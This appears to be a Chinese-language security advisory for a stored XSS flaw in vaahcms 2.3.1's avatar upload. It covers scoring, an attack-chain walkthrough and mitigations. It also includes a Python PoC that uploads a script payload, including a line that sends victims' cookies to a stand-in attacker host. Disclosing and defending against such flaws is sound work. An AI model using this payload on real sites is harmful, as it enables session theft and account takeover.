CVE-2025-61183：vaahcms 2.3.1 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61183

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

vaahcms

漏洞概述

CVE-2025-61183是存在于vaahcms内容管理系统v2.3.1版本中的一个跨站脚本（Cross-Site Scripting, XSS）漏洞。该漏洞的CVSS 3.1评分为6.1分，属于中等严重等级。vaahcms是一个基于Laravel框架的开源CMS系统，广泛用于构建网站和管理数字内容。该漏洞位于UserBase.php文件的storeAvatar()方法中，具体存在于用户头像上传功能模块中。远程攻击者可以通过构造恶意的上传文件（如包含恶意JavaScript脚本的图片或文件名），利用上传方法中的输入验证缺陷，成功执行任意JavaScript代码。攻击成功后，攻击者可以在受害者的浏览器上下文中执行任意脚本，可能导致会话劫持、敏感信息窃取、钓鱼攻击或恶意操作执行等后果。由于该漏洞无需认证即可利用（PR:N），且影响范围为变更范围（S:C），即可能影响到超出漏洞组件本身的其他组件，因此具有较高的实际危害性。该漏洞于2025年10月8日由MITRE组织披露，目前已在GitHub上建立了公开的漏洞仓库供安全研究社区参考。

技术细节

该漏洞的核心问题出在vaahcms v2.3.1的UserBase.php文件中的storeAvatar()方法。当用户上传头像时，该方法未对上传的文件名、文件内容或相关元数据进行充分的输入验证和过滤，导致攻击者可以将恶意脚本代码注入到上传的文件中。具体利用方式如下：

1. **攻击入口**：storeAvatar()方法是用户头像上传功能的核心处理函数，接收用户上传的文件作为输入。

2. **过滤缺失**：该方法在处理上传文件时，未对文件名进行严格的字符过滤，也未对文件内容进行安全检查，允许包含HTML/JavaScript标签的文件被接受。

3. **存储与渲染**：上传的恶意文件被存储在服务器端，当其他用户或管理员查看包含该头像的用户资料时，恶意脚本将在受害者浏览器中执行。

4. **攻击向量**：由于漏洞利用涉及用户交互（UI:R），需要受害者访问包含恶意内容的页面或查看恶意头像才能触发。

5. **影响范围**：CVSS向量中的S:C（Scope Changed）表明该漏洞可能影响到应用程序的其他组件或功能，扩大了攻击的影响面。

攻击者利用该漏洞可以窃取用户会话Cookie、进行钓鱼攻击、篡改页面内容、劫持用户账户或执行其他恶意操作。由于无需认证即可利用，任何能够访问上传功能的用户都可能成为攻击者。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用vaahcms v2.3.1版本，并定位到用户头像上传功能（storeAvatar()方法）的接口端点。

STEP 2

步骤2：构造恶意载荷

攻击者构造包含恶意JavaScript代码的文件作为头像文件，文件名或内容中嵌入XSS payload，如窃取Cookie、会话劫持或执行管理操作的脚本。

STEP 3

步骤3：上传恶意文件

攻击者通过storeAvatar()方法的API端点上传恶意头像文件，由于缺乏输入验证，恶意文件被成功存储到服务器。

STEP 4

步骤4：触发XSS执行

当管理员或其他用户查看包含恶意头像的用户资料页面时，恶意JavaScript代码在受害者浏览器中自动执行。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者上下文中执行，可窃取会话Cookie、进行钓鱼攻击、劫持账户或以受害者权限执行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61183 PoC - vaahcms v2.3.1 Stored XSS via storeAvatar()
# Exploit: Upload a malicious file as avatar to execute arbitrary JavaScript

import requests

TARGET_URL = "http://target-vaahcms-site.com"
UPLOAD_ENDPOINT = "/api/vaah/users/avatar"  # storeAvatar() method endpoint

# Step 1: Create a malicious payload file
# The malicious file contains XSS payload that will execute when the avatar is rendered
malicious_filename = 'avatar<img src=x onerror=alert(document.cookie)>.jpg'

# JavaScript payload to steal cookies or perform actions
xss_payload = '''
<script>
  // Steal session cookies
  var img = new Image();
  img.src = "http://attacker-server.com/steal?cookie=" + document.cookie;
  
  // Or perform actions on behalf of the victim
  fetch('/api/admin/users', {credentials: 'include'});
</script>
'''

# Step 2: Upload the malicious avatar
headers = {
    "User-Agent": "Mozilla/5.0",
    "Accept": "application/json"
}

files = {
    "avatar": (malicious_filename, xss_payload, "image/jpeg")
}

# Step 3: Send the upload request
response = requests.post(
    TARGET_URL + UPLOAD_ENDPOINT,
    files=files,
    headers=headers
)

print(f"Upload Status: {response.status_code}")
print(f"Response: {response.text}")

# Step 4: When any user views the profile with this avatar,
# the XSS payload will execute in their browser context
print("Payload uploaded successfully. XSS will trigger when avatar is viewed.")

影响范围

vaahcms < 2.3.2

vaahcms 2.3.1

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对用户头像上传功能实施临时访问控制，限制未经授权的上传操作；2）在Web应用防火墙（WAF）中添加针对上传文件名的XSS过滤规则；3）对所有用户上传的文件名进行HTML实体编码处理；4）部署严格的内容安全策略（CSP），限制内联脚本执行；5）监控异常的文件上传行为和可疑的用户活动；6）定期检查已上传的头像文件，移除可疑的恶意文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61183
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61183
3 Details https://www.cvedetails.com/cve/CVE-2025-61183/
4 VulDB https://vuldb.com/cve/CVE-2025-61183
5 Link https://github.com/thawphone/CVE-2025-61183
6 Link https://github.com/webreinvent/vaahcms/issues/301